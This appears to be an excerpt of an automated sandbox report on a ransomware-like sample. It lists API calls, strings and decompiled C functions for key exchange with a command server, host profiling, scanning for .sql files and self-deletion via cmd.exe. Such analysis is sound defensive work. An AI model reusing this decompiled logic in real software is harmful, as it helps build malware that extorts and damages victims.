			}

0x00d7575f
0x00d75760
0x00d75762
0x00d75763
0x00d75768
0x00d7576c
0x00d7576e
0x00d75772
0x00d75774
0x00d75775
0x00d75777
0x00d75778
0x00d7577a
0x00d7577b
0x00d7577d
0x00d7577e
0x00d75783
0x00d75785
0x00d75786
0x00d7578f
0x00d75798
0x00d757a9
0x00d757b4
0x00d757ba
0x00d757c0
0x00d757c6
0x00d757c8
0x00d757cc
0x00d757d3
0x00d757dc
0x00d757f1
0x00d757f5
0x00d757e2
0x00d757e2
0x00d757e5
0x00d757e9
0x00d757ed
0x00d757ed
0x00d757ff
0x00d75806
0x00d7581f
0x00d7581f
0x00d75821
0x00d75808
0x00d75808
0x00d7580d
0x00000000
0x00d7580f
0x00d7580f
0x00d75811
0x00d75815
0x00d75817
0x00d75819
0x00d75819
0x00d7580d
0x00d7582a
0x00d7582e
0x00d7583d
0x00d7583f
0x00d7583f
0x00d75845
0x00000000
0x00d7584b
0x00d7584b
0x00d75857
0x00d7586a
0x00d7586f
0x00d75883
0x00d7588c
0x00d758a0
0x00d758a5
0x00d758af
0x00d758b3
0x00d758b7
0x00d758bf
0x00d758c1
0x00d758c5
0x00d758c8
0x00d758df
0x00d758ce
0x00d758d1
0x00d758d5
0x00d758d9
0x00d758d9
0x00d758ea
0x00d758f0
0x00d758fa
0x00d758fa
0x00d75906
0x00d7590c
0x00d7590e
0x00d75912
0x00d75916
0x00d75920
0x00d75920
0x00d75925
0x00d7592b
0x00d7592e
0x00d7592e
0x00d75933
0x00d75934
0x00d75936
0x00d7593a
0x00d7593e
0x00d7593e
0x00d75943
0x00d75949
0x00d7594b
0x00d7594f
0x00d75953
0x00d75953
0x00d75958
0x00d7595e
0x00d75961
0x00d75961
0x00d75966
0x00d75967
0x00d75969
0x00d7596d
0x00d75953
0x00d75971
0x00d75981
0x00d75990
0x00d75994
0x00d7599f
0x00d759a2
0x00d759c0
0x00d759cc
0x00d759cf
0x00d759f1
0x00d759fd
0x00d75a17
0x00d75a27
0x00d75a29
0x00d75a2f
0x00d75a38
0x00d75a46
0x00d75a3e
0x00d75a3e
0x00d75a3e
0x00d75a4e
0x00d75a50
0x00d75a56
0x00d75a58
0x00d75a67
0x00d75a6b
0x00d75a77
0x00d75a7c
0x00d75a85
0x00d75a8b
0x00d75a8f
0x00d75a97
0x00d75ab8
0x00d75ac1
0x00d75acf
0x00d75ade
0x00d75ae2
0x00d75afe
0x00d75b00
0x00d75b00
0x00d75b10
0x00d75b10
0x00d75b1d
0x00d75b23
0x00d75b23
0x00d75b26
0x00d75b2c
0x00d75b36
0x00d75b36
0x00d75b2e
0x00d75b2e
0x00d75b34
0x00000000
0x00000000
0x00d75b34
0x00d75b3f
0x00d75b45
0x00d75b47
0x00d75b4b
0x00d75b50
0x00d75b50
0x00d75b55
0x00d75b5b
0x00d75b5e
0x00d75b5e
0x00d75b63
0x00d75b64
0x00d75b66
0x00d75b6a
0x00d75b50
0x00d75b6e
0x00d75b84
0x00d75b90
0x00d75b9a
0x00d75ba4
0x00d75bd7
0x00d75bdd
0x00d75be2
0x00d75be2
0x00d75bf6
0x00d75c03
0x00d75c10
0x00d75c1a
0x00d75c1a
0x00d75ba6
0x00d75bb7
0x00d75bc4
0x00d75bd1
0x00d75bd3
0x00d75bd3
0x00d75ba4
0x00d75c2a
0x00d75c30
0x00d75c3d

APIs

Part of subcall function 00D739B0: GetProcessHeap.KERNEL32(?,?,00D74587,00000000,?,00000000), ref: 00D73A4C

Part of subcall function 00D76D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00D76DB7
Part of subcall function 00D76D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00D76DC8
Part of subcall function 00D76D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00D76DE6
Part of subcall function 00D76D90: GetComputerNameW.KERNEL32 ref: 00D76DF0
Part of subcall function 00D76D90: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 00D76E10
Part of subcall function 00D76D90: wsprintfW.USER32 ref: 00D76E51
Part of subcall function 00D76D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00D76E6E
Part of subcall function 00D76D90: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00D76E92
Part of subcall function 00D76D90: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,?,?), ref: 00D76EB6
Part of subcall function 00D76D90: RegCloseKey.ADVAPI32(00000000), ref: 00D76ED2

Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76BF2
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76BFD
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C13
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C1E
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(00D748B6,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C34
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C3F
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C55
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C60
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C76
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C81
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C97
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76CA2
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76CC1
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76CCC

VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 00D757C0
CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 00D7586A
CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00D75883
lstrlenA.KERNEL32(00000000), ref: 00D7588C
lstrlenA.KERNEL32(?), ref: 00D75894
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 00D758A5
lstrlenA.KERNEL32(?), ref: 00D758BF
lstrlenA.KERNEL32(00000000), ref: 00D758E8
lstrlenA.KERNEL32(?), ref: 00D75908
lstrlenA.KERNEL32(?), ref: 00D75934
lstrlenA.KERNEL32(00000000), ref: 00D75945
lstrlenA.KERNEL32(00000000), ref: 00D75967
lstrcatW.KERNEL32(?,action=call&), ref: 00D75981
lstrlenW.KERNEL32(?), ref: 00D7598A
lstrcatW.KERNEL32(?,&pub_key=), ref: 00D7599F
lstrlenW.KERNEL32(?), ref: 00D759A2
lstrlenA.KERNEL32(00000000), ref: 00D759AB
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,746569A0,00000000), ref: 00D759C0
lstrcatW.KERNEL32(?,&priv_key=), ref: 00D759CC
lstrlenW.KERNEL32(?), ref: 00D759CF
lstrlenA.KERNEL32(00000000), ref: 00D759DC
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,746569A0,00000000), ref: 00D759F1
lstrcatW.KERNEL32(?,&version=2.1), ref: 00D759FD
lstrlenW.KERNEL32(?), ref: 00D75A09
VirtualAlloc.KERNEL32(00000000,-00000012,00003000,00000040), ref: 00D75A1D
lstrlenW.KERNEL32(?), ref: 00D75A2D
lstrlenW.KERNEL32(?), ref: 00D75A4E
_memset.LIBCMT ref: 00D75A97
lstrlenA.KERNEL32(?), ref: 00D75AAA

Part of subcall function 00D75C40: _memset.LIBCMT ref: 00D75C6D

CryptBinaryToStringA.CRYPT32(?,-00000012,40000001,?,?), ref: 00D75AF6
GetLastError.KERNEL32 ref: 00D75B00
lstrlenA.KERNEL32(?), ref: 00D75B07
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 00D75B16
lstrlenA.KERNEL32(?), ref: 00D75B21
lstrlenA.KERNEL32(?), ref: 00D75B41
lstrlenA.KERNEL32(?), ref: 00D75B64
lstrlenA.KERNEL32(00000000), ref: 00D75B73
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000000), ref: 00D75B84
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D75BB7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D75BC4
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D75BD1
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D75BF6
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D75C03
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D75C10
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D75C2A

Strings

#shasj, xrefs: 00D75A50
&pub_key=, xrefs: 00D75999
&version=2.1, xrefs: 00D759F7
action=call&, xrefs: 00D7597B
&priv_key=, xrefs: 00D759C6

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$Free$lstrcat$BinaryByteCharCryptMultiStringWide$Name_memset$CloseComputerErrorHeapLastOpenProcessQueryUserValuewsprintf
String ID: #shasj$&priv_key=$&pub_key=$&version=2.1$action=call&
API String ID: 2781787645-879081296
Opcode ID: 4a9bb0117c607fe65eed5d2c3a625999c05fa9c7800aaf2ad033b4a006fa03d6
Instruction ID: 76465767c3bf311723828b1205fb145916921dcd8b2e44f30c05978f3ac7d4c7
Opcode Fuzzy Hash: 4a9bb0117c607fe65eed5d2c3a625999c05fa9c7800aaf2ad033b4a006fa03d6
Instruction Fuzzy Hash: BCE19C71508301AFD711DF24DC85B6BBBE5EB88754F04891CF689A72A0E7B0E905CBA7

Uniqueness

Uniqueness Score: -1.00%

Function 00D75050 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 191
memorystringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00D75050(CHAR* __ecx, CHAR** __edx) {
				int _v8;
				CHAR* _v12;
				int _v16;
				char _v18;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				void* _v36;
				CHAR** _v40;
				void* _v44;
				char _v299;
				char _v300;
				void* _v356;
				void* _v360;
				int _t55;
				int _t56;
				BYTE* _t57;
				int _t59;
				void* _t63;
				void* _t64;
				char _t65;
				void* _t77;
				signed int _t79;
				signed int _t81;
				int _t82;
				int _t85;
				char _t87;
				CHAR* _t95;
				int _t97;
				char* _t98;
				void* _t107;
				void* _t108;
				signed char _t109;
				short* _t111;
				WCHAR* _t116;
				CHAR* _t117;
				BYTE* _t124;
				WCHAR* _t125;
				WCHAR* _t126;
				void* _t127;
				long _t128;
				char* _t129;
				int _t130;
				void* _t131;
				CHAR* _t132;
				void* _t133;
				long _t134;
				char* _t135;

				_v40 = __edx;
				_v12 = __ecx;
				_t55 = lstrlenA(__ecx);
				_t107 = VirtualAlloc;
				_t56 = _t55 + 1;
				_v16 = _t56;
				_t4 = _t56 + 1; // 0x2
				_t128 = _t4;
				_t57 = VirtualAlloc(0, _t128, 0x3000, 0x40);
				_v44 = _t57;
				if(_t57 == 0 || _v16 >= _t128) {
					_t124 = 0;
					__eflags = 0;
				} else {
					_t124 = _t57;
				}
				_t129 = 0;
				_t59 = CryptStringToBinaryA(_v12, 0, 1, _t124,  &_v16, 0, 0);
				_t144 = _t59;
				if(_t59 == 0) {
					GetLastError();
					goto L26;
				} else {
					_t63 = "#shasj"; // 0x61687323
					asm("movq xmm0, [0xd80128]");
					_t130 = _v16;
					_v24 = _t63;
					_t64 =  *0xd80134; // 0x6a73
					_v20 = _t64;
					_t65 =  *0xd80136; // 0x0
					_v18 = _t65;
					asm("movq [ebp-0x1c], xmm0");
					_v300 = 0;
					E00D78B30( &_v299, 0, 0xff);
					E00D75C40( &_v300,  &_v32, lstrlenA( &_v32));
					E00D75CF0( &_v300, _t124, _t130);
					_t116 =  &_v32;
					asm("xorps xmm0, xmm0");
					asm("movdqu [ebp-0x1c], xmm0");
					E00D733E0(_t116, _t144, _t124);
					if(_v32 != 0) {
						E00D74FD0();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t107);
						_push(_t130);
						_push(_t124);
						_t125 = _t116;
						_t131 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
						_v360 = _t131;
						GetModuleFileNameW(0, _t131, 0x200);
						_t108 = CreateFileW(_t131, 0x80000000, 1, 0, 3, 0x80, 0);
						_v356 = _t108;
						__eflags = _t108 - 0xffffffff;
						if(_t108 != 0xffffffff) {
							_t77 = CreateFileMappingW(_t108, 0, 8, 0, 0, 0);
							_v28 = _t77;
							__eflags = _t77;
							if(_t77 != 0) {
								_t79 = MapViewOfFile(_t77, 1, 0, 0, 0);
								_v16 = _t79;
								__eflags = _t79;
								if(_t79 != 0) {
									_t41 = _t79 + 0x4e; // 0x4e
									_t132 = _t41;
									_v12 = _t132;
									_t81 = lstrlenW(_t125);
									_t109 = 0;
									_t126 =  &(_t125[_t81]);
									_t82 = lstrlenA(_t132);
									__eflags = _t82 + _t82;
									if(_t82 + _t82 != 0) {
										_t117 = _t132;
										do {
											__eflags = _t109 & 0x00000001;
											if((_t109 & 0x00000001) != 0) {
												 *((char*)(_t126 + _t109)) = 0;
											} else {
												_t87 =  *_t132;
												_t132 =  &(_t132[1]);
												 *((char*)(_t126 + _t109)) = _t87;
											}
											_t109 = _t109 + 1;
											_t85 = lstrlenA(_t117);
											_t117 = _v12;
											__eflags = _t109 - _t85 + _t85;
										} while (_t109 < _t85 + _t85);
									}
									UnmapViewOfFile(_v16);
									_t108 = _v20;
									_t131 = _v24;
								}
								CloseHandle(_v28);
							}
							CloseHandle(_t108);
						}
						return VirtualFree(_t131, 0, 0x8000);
					} else {
						_t127 = _v28;
						_v12 = 1;
						if(_t127 != 0) {
							_t97 = lstrlenA(_t127);
							_v8 = _t97;
							_t24 = _t97 + 1; // 0x1
							_t134 = _t24;
							_t98 = VirtualAlloc(0, _t134, 0x3000, 0x40);
							_v36 = _t98;
							if(_t98 == 0 || _v8 >= _t134) {
								_t135 = 0;
								__eflags = 0;
							} else {
								_t135 = _t98;
							}
							if(CryptStringToBinaryA(_t127, 0, 1, _t135,  &_v8, 0, 0) != 0) {
								_t111 = VirtualAlloc(0, 2 + _v8 * 2, 0x3000, 4);
								if(_t111 != 0) {
									if(MultiByteToWideChar(0xfde9, 0, _t135, 0xffffffff, _t111, _v8 + 1) <= 0) {
										GetLastError();
									} else {
										 *0xd82b00 = _t111;
									}
								}
							}
							VirtualFree(_v36, 0, 0x8000);
						}
						_t133 = _v24;
						if(_t133 != 0) {
							_t95 = VirtualAlloc(0, lstrlenA(_t133) + 1, 0x3000, 4);
							 *_v40 = _t95;
							if(_t95 != 0) {
								lstrcpyA(_t95, _t133);
							}
						}
						_t88 = GetProcessHeap;
						if(_t127 != 0) {
							HeapFree(GetProcessHeap(), 0, _t127);
							_t88 = GetProcessHeap;
						}
						if(_t133 != 0) {
							HeapFree( *_t88(), 0, _t133);
						}
						_t129 = _v12;
						L26:
						VirtualFree(_v44, 0, 0x8000);
						return _t129;
					}
				}
			}

0x00d7505d
0x00d75062
0x00d75065
0x00d7506b
0x00d75071
0x00d75079
0x00d7507c
0x00d7507c
0x00d75082
0x00d75084
0x00d75089
0x00d75094
0x00d75094
0x00d75090
0x00d75090
0x00d75090
0x00d75096
0x00d750a5
0x00d750ab
0x00d750ad
0x00d7525e
0x00000000
0x00d750b3
0x00d750b3
0x00d750b8
0x00d750c0
0x00d750c3
0x00d750c6
0x00d750cc
0x00d750d0
0x00d750da
0x00d750e6
0x00d750eb
0x00d750f2
0x00d7510e
0x00d7511c
0x00d75124
0x00d75127
0x00d7512a
0x00d75130
0x00d75139
0x00d75266
0x00d7526b
0x00d7526c
0x00d7526d
0x00d7526e
0x00d7526f
0x00d75276
0x00d75277
0x00d75278
0x00d75287
0x00d7528f
0x00d75299
0x00d7529c
0x00d752bb
0x00d752bd
0x00d752c0
0x00d752c3
0x00d752d4
0x00d752da
0x00d752dd
0x00d752df
0x00d752ea
0x00d752f0
0x00d752f3
0x00d752f5
0x00d752f7
0x00d752f7
0x00d752fb
0x00d752fe
0x00d75305
0x00d75307
0x00d7530a
0x00d75310
0x00d75312
0x00d75314
0x00d75316
0x00d75316
0x00d75319
0x00d75323
0x00d7531b
0x00d7531b
0x00d7531d
0x00d7531e
0x00d7531e
0x00d75328
0x00d75329
0x00d7532f
0x00d75334
0x00d75334
0x00d75316
0x00d7533b
0x00d75341
0x00d75344
0x00d75344
0x00d7534a
0x00d7534a
0x00d75351
0x00d75351
0x00d7536b
0x00d7513f
0x00d7513f
0x00d75142
0x00d7514b
0x00d75152
0x00d7515f
0x00d75162
0x00d75162
0x00d75168
0x00d7516a
0x00d7516f
0x00d7517a
0x00d7517a
0x00d75176
0x00d75176
0x00d75176
0x00d75192
0x00d751aa
0x00d751ae
0x00d751c8
0x00d751d2
0x00d751ca
0x00d751ca
0x00d751ca
0x00d751c8
0x00d751d8
0x00d751e8
0x00d751e8
0x00d751ee
0x00d751f3
0x00d75207
0x00d7520c
0x00d75210
0x00d75214
0x00d75214
0x00d75210
0x00d75220
0x00d75227
0x00d7522f
0x00d75231
0x00d75231
0x00d75238
0x00d75240
0x00d75240
0x00d75242
0x00d75245
0x00d7524f
0x00d7525d
0x00d7525d
0x00d75139

APIs

lstrlenA.KERNEL32(?,00000001,?,?), ref: 00D75065
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 00D75082
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00D750A5
_memset.LIBCMT ref: 00D750F2
lstrlenA.KERNEL32(?), ref: 00D750FE
lstrlenA.KERNEL32(?,00000000), ref: 00D75152
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00D75168
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00D7518A
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00D751A8
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000001), ref: 00D751C0
GetLastError.KERNEL32 ref: 00D751D2
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D751E8
lstrlenA.KERNEL32(00D754E4,00003000,00000004,00000000), ref: 00D751FD
VirtualAlloc.KERNEL32(00000000,00000001), ref: 00D75207
lstrcpyA.KERNEL32(00000000,00D754E4), ref: 00D75214
HeapFree.KERNEL32(00000000), ref: 00D7522F
HeapFree.KERNEL32(00000000), ref: 00D75240
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D7524F
GetLastError.KERNEL32 ref: 00D7525E

Part of subcall function 00D74FD0: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,?,00D7526B,00000000), ref: 00D74FE6
Part of subcall function 00D74FD0: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00D74FF8
Part of subcall function 00D74FD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 00D75008
Part of subcall function 00D74FD0: wsprintfW.USER32 ref: 00D75019
Part of subcall function 00D74FD0: ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00D75033
Part of subcall function 00D74FD0: ExitProcess.KERNEL32 ref: 00D7503B

Strings

#shasj, xrefs: 00D750B3

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$Freelstrlen$BinaryCryptErrorHeapLastString$ByteCharExecuteExitFileModuleMultiNameProcessShellWide_memsetlstrcpywsprintf
String ID: #shasj
API String ID: 463976167-2423951532
Opcode ID: 6a1a4a70e18f9f130625703c1eac2d702dc7bfd201a25f58b1b65c3780c2d471
Instruction ID: ee152c949c9cb5432292c11291649945aedc4b398b8917882ef62e6cdb707959
Opcode Fuzzy Hash: 6a1a4a70e18f9f130625703c1eac2d702dc7bfd201a25f58b1b65c3780c2d471
Instruction Fuzzy Hash: 4251C732E00315ABDB209BA59C59BAFBBB8EF49710F544054FA0CF7294EBB09940CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00D764A0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 136
stringfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D764A0(WCHAR* __ecx) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				long _v24;
				struct _WIN32_FIND_DATAW _v620;
				int _t38;
				struct _SECURITY_ATTRIBUTES* _t40;
				int _t50;
				WCHAR* _t52;
				intOrPtr _t53;
				void* _t54;
				WCHAR* _t57;
				long _t64;
				WCHAR* _t66;
				void* _t67;

				_t66 = __ecx;
				_v16 = __ecx;
				_t52 =  &(_t66[lstrlenW(__ecx)]);
				_v20 = _t52;
				lstrcatW(_t66, "*");
				_v8 = FindFirstFileW(_t66,  &_v620);
				 *_t52 = 0;
				_t53 = 0;
				do {
					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
						goto L20;
					} else {
						lstrcatW(_t66,  &(_v620.cFileName));
						_t38 = lstrlenW(_t66);
						_t10 = _t38 - 1; // -1
						_t57 =  &(_t66[_t10]);
						if(_t38 == 0) {
							L18:
							_t53 = 0;
							goto L19;
						} else {
							while( *_t57 != 0x2e) {
								_t57 = _t57 - 2;
								_t38 = _t38 - 1;
								if(_t38 != 0) {
									continue;
								}
								break;
							}
							if(_t38 == 0) {
								goto L18;
							} else {
								_t40 = lstrcmpW(_t57, L".sql");
								if(_t40 != 0) {
									goto L18;
								} else {
									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
									_t64 = GetFileSize(_t54, 0);
									_v12 = 0;
									if(_t64 < 0x40000000) {
										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
										if(_t67 != 0) {
											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E00D77C10(_t67, "*******************") != 0) {
												_t50 = lstrlenA("*******************");
												_t15 = _t67 + 1; // 0x1
												_v12 = E00D76440(_t15 + _t50);
											}
											VirtualFree(_t67, 0, 0x8000);
										}
										_t66 = _v16;
									}
									CloseHandle(_t54);
									_t53 = _v12;
									if(_t53 == 0) {
										L19:
										 *_v20 = 0;
										goto L20;
									}
								}
							}
						}
					}
					break;
					L20:
				} while (FindNextFileW(_v8,  &_v620) != 0);
				FindClose(_v8);
				return _t53;
			}

0x00d764ab
0x00d764af
0x00d764be
0x00d764c1
0x00d764c4
0x00d764de
0x00d764e3
0x00d764e6
0x00d764f0
0x00d76500
0x00000000
0x00d7651c
0x00d76524
0x00d7652b
0x00d76531
0x00d76534
0x00d76539
0x00d76608
0x00d76608
0x00000000
0x00d76540
0x00d76540
0x00d76546
0x00d76549
0x00d7654a
0x00000000
0x00000000
0x00000000
0x00d7654a
0x00d7654e
0x00000000
0x00d76554
0x00d7655a
0x00d7655e
0x00000000
0x00d76564
0x00d76577
0x00d76582
0x00d76586
0x00d7658f
0x00d765a0
0x00d765a4
0x00d765b7
0x00d765ce
0x00d765d4
0x00d765de
0x00d765de
0x00d765e9
0x00d765e9
0x00d765ef
0x00d765ef
0x00d765f3
0x00d765f9
0x00d765fe
0x00d7660a
0x00d7660f
0x00000000
0x00d7660f
0x00d765fe
0x00d7655e
0x00d7654e
0x00d76539
0x00000000
0x00d76612
0x00d76622
0x00d7662d
0x00d7663b

APIs

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00D764B2
lstrcatW.KERNEL32(00000000,00D80364), ref: 00D764C4
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00D764D2
lstrcmpW.KERNEL32(?,00D80368,?,?), ref: 00D764FC
lstrcmpW.KERNEL32(?,00D8036C,?,?), ref: 00D76512
lstrcatW.KERNEL32(00000000,?), ref: 00D76524
lstrlenW.KERNEL32(00000000,?,?), ref: 00D7652B
lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 00D7655A
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00D76571
GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 00D7657C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 00D7659A
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 00D765AF
lstrlenA.KERNEL32(*******************,?,?), ref: 00D765CE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 00D765E9
CloseHandle.KERNEL32(00000000,?,?), ref: 00D765F3
FindNextFileW.KERNEL32(?,?,?,?), ref: 00D7661C
FindClose.KERNEL32(?,?,?), ref: 00D7662D

Strings

*******************, xrefs: 00D765B9, 00D765C9
.sql, xrefs: 00D76554

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
String ID: *******************$.sql
API String ID: 3616287438-58436570
Opcode ID: 06b015707939a692ea041a1894931ab2fea119803afe686eff9d8c278f35cf23
Instruction ID: 1a2157d99191cfa98611e59dac6c59d97710b763c921bbf76b1a0ebc4c88eb52
Opcode Fuzzy Hash: 06b015707939a692ea041a1894931ab2fea119803afe686eff9d8c278f35cf23
Instruction Fuzzy Hash: 67417072641715AFDB20AB649C59FAEBBBCEF04704F548469F90AE2250FB70DA44CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00D75540 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 169
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00D75540(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				BYTE* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				char _v22;
				short _v24;
				short _v28;
				char _v36;
				char _v180;
				char _v435;
				char _v436;
				WCHAR* _t40;
				signed int _t48;
				int _t60;
				void* _t61;
				char _t68;
				CHAR* _t71;
				void* _t74;
				short _t79;
				short _t80;
				char _t81;
				BYTE* _t84;
				WCHAR* _t92;
				signed int _t93;
				char* _t95;
				void* _t96;
				int _t98;
				long _t99;
				void* _t100;

				_t74 = __ecx;
				_t96 = __edx;
				_v12 = __ecx;
				_t40 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
				_v16 = _t40;
				if(_t40 == 0) {
					_t92 = 0;
					_t71 = 0;
				} else {
					_t3 =  &(_t40[0x400]); // 0x800
					_t71 = _t3;
					_t92 = _t40;
				}
				_push(_t96);
				_v8 = _t92;
				wsprintfW(_t92, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v12, _a4, _a8);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				E00D739B0( &_v180);
				E00D76D90( &_v180);
				E00D76BA0( &_v180);
				E00D769A0( &_v180,  &(_t92[lstrlenW(_t92)]));
